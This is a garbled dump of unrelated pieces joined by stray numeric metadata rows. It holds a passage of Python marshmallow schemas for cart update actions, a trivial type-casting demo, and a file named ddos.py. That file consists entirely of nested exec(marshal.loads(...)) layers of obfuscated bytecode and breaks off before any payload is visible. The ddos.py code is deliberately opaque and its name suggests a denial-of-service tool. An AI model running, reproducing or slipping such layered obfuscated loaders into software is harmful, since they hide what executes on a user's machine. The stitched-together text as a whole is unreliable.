        return models.CartSetLineItemTaxRateAction(**data)
class CartSetLineItemTotalPriceActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemTotalPrice` cart update action; loads
    into :class:`models.CartSetLineItemTotalPriceAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    external_total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTotalPrice",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemTotalPriceAction(**data)
class CartSetLocaleActionSchema(CartUpdateActionSchema):
    """Schema for the `setLocale` cart update action; loads into
    :class:`models.CartSetLocaleAction`."""

    locale = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLocaleAction(**data)
class CartSetShippingAddressActionSchema(CartUpdateActionSchema):
    """Schema for the `setShippingAddress` cart update action; loads into
    :class:`models.CartSetShippingAddressAction`."""

    address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetShippingAddressAction(**data)
class CartSetShippingMethodActionSchema(CartUpdateActionSchema):
    """Schema for the `setShippingMethod` cart update action; loads into
    :class:`models.CartSetShippingMethodAction`."""

    shipping_method = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".shipping_method.ShippingMethodResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingMethod",
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetShippingMethodAction(**data)
class CartSetShippingMethodTaxAmountActionSchema(CartUpdateActionSchema):
    """Schema for the `setShippingMethodTaxAmount` cart update action;
    loads into :class:`models.CartSetShippingMethodTaxAmountAction`."""

    external_tax_amount = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxAmount",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetShippingMethodTaxAmountAction(**data)
class CartSetShippingMethodTaxRateActionSchema(CartUpdateActionSchema):
    """Schema for the `setShippingMethodTaxRate` cart update action; loads
    into :class:`models.CartSetShippingMethodTaxRateAction`."""

    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetShippingMethodTaxRateAction(**data)
class CartSetShippingRateInputActionSchema(CartUpdateActionSchema):
    """Schema for the `setShippingRateInput` cart update action; loads into
    :class:`models.CartSetShippingRateInputAction`.

    ``shippingRateInput`` is polymorphic on the JSON ``type`` discriminator
    (``Classification`` vs ``Score``).
    """

    shipping_rate_input = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "Classification": helpers.absmod(
                __name__, ".ClassificationShippingRateInputDraftSchema"
            ),
            "Score": helpers.absmod(__name__, ".ScoreShippingRateInputDraftSchema"),
        },
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingRateInput",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetShippingRateInputAction(**data)
class CartUpdateItemShippingAddressActionSchema(CartUpdateActionSchema):
    """Schema for the `updateItemShippingAddress` cart update action; loads
    into :class:`models.CartUpdateItemShippingAddressAction`."""

    address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartUpdateItemShippingAddressAction(**data)
class CustomLineItemImportDraftSchema(helpers.BaseSchema):
    """Schema that deserializes a `CustomLineItemImportDraft` payload into
    :class:`models.CustomLineItemImportDraft`; unknown keys are ignored."""

    name = LocalizedStringField(allow_none=True, missing=None)
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    money = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    slug = marshmallow.fields.String(allow_none=True, missing=None)
    state = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxRate",
    )
    tax_category = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        return models.CustomLineItemImportDraft(**data)
| 32.11326
| 88
| 0.65086
| 7,920
| 93,000
| 7.374369
| 0.06351
| 0.044534
| 0.064327
| 0.053317
| 0.769523
| 0.766287
| 0.754336
| 0.747128
| 0.733636
| 0.726325
| 0
| 0
| 0.24843
| 93,000
| 2,895
| 89
| 32.124352
| 0.835599
| 0.00071
| 0
| 0.725249
| 1
| 0
| 0.147713
| 0.087743
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034592
| false
| 0
| 0.004771
| 0.010338
| 0.257256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a5dd77af680707d37650fbaa6250f0830f1941f
| 107
|
py
|
Python
|
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
# Type-casting demo: convert a float to its string representation and show
# how type() reflects the change. (The equivalent int example is kept
# disabled for reference.)
# a = 42
# print(type(a))
# a = str(a)
# print(type(a))
a = 42.3
print(type(a))  # <class 'float'>
a = f"{a}"  # equivalent to str(a): yields "42.3"
print(type(a))  # <class 'str'>
| 10.7
| 16
| 0.53271
| 23
| 107
| 2.478261
| 0.26087
| 0.631579
| 0.701754
| 0.578947
| 0.877193
| 0.877193
| 0.877193
| 0.877193
| 0.877193
| 0
| 0
| 0.05814
| 0.196262
| 107
| 9
| 17
| 11.888889
| 0.604651
| 0.439252
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
1ad098a3f232958a53327bbe5d1205a10e228108
| 229,198
|
py
|
Python
|
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8e:\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf79\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`9\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc98\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs28\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9b7\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x047\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsm6\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff
\xff\xff\xffNs\xd65\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs?5\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa84\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x114\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsz3\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe32\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsL2\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb51\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1e1\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x
00i\xff\xff\xff\xffNs\x870\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf0/\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsY/\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc2.\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs+.\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x94-\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfd,\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsf,\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcf+\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x0
0\x00\x00i\xff\xff\xff\xffNs8+\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa1*\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\n*\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNss)\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdc(\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsE(\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xae\'\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x17\'\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x80&\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(
\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe9%\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsR%\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbb$\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs$$\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8d#\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf6"\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs_"\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc8!\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs1!\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x
00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9a \x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x03 \x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsl\x1f\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd5\x1e\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs>\x1e\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa7\x1d\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x10\x1d\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsy\x1c\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe2\x1b\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\
x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsK\x1b\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb4\x1a\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1d\x1a\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x86\x19\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00